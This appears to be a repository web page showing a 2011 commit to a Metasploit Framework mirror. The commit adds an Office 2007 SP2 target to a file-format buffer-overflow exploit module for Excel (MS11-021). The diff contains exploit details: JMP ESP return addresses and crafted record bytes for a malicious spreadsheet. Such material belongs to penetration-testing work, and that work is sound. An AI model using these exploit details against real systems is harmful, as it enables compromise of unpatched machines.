infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add Office 2007 SP2 target, thanks Juan 

git-svn-id: file:///home/svn/framework3/trunk@14171 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Wei Chen 2011-11-06 17:33:29 +00:00
parent 70a64bf4db
commit 43a22d3fa0
1 changed files with 7 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb
View File

@ -55,9 +55,9 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'win', 'Platform' => 'win',
'Targets' => 'Targets' =>
[ [
# JMP ESP in EXCEL (Office 2007)
# Win XP SP3 (Vista and 7 will try to repair the file) # Win XP SP3 (Vista and 7 will try to repair the file)
['Microsoft Office Excel 2007 on Windows XP', {'Ret' => 0x3006A48D }], ['Microsoft Office Excel 2007 on Windows XP', {'Ret' => 0x3006A48D }], # JMP ESP in EXCEL (Office 2007)
['Microsoft Office Excel 2007 SP2 on Windows XP', {'Ret'=>0x3006b185}], #JMP ESP in excel
], ],
'Privileged' => false, 'Privileged' => false,
'DisclosureDate' => "Aug 9 2011", 'DisclosureDate' => "Aug 9 2011",
@ -81,7 +81,11 @@ class Metasploit3 < Msf::Exploit::Remote
record = '' record = ''
record << "\xa7\x00" #record type record << "\xa7\x00" #record type
record << "\x04\x00" #record length record << "\x04\x00" #record length
if target.name =~ /Excel 2007 SP2/ # Microsoft Office Excel 2007 SP2
record << "\xb0\x0d\x0c\x00" #data
else
record << "\xb0\x0f\x0c\x00" #data record << "\xb0\x0f\x0c\x00" #data
end
# Offset 1564 # Offset 1564
continue_record = '' continue_record = ''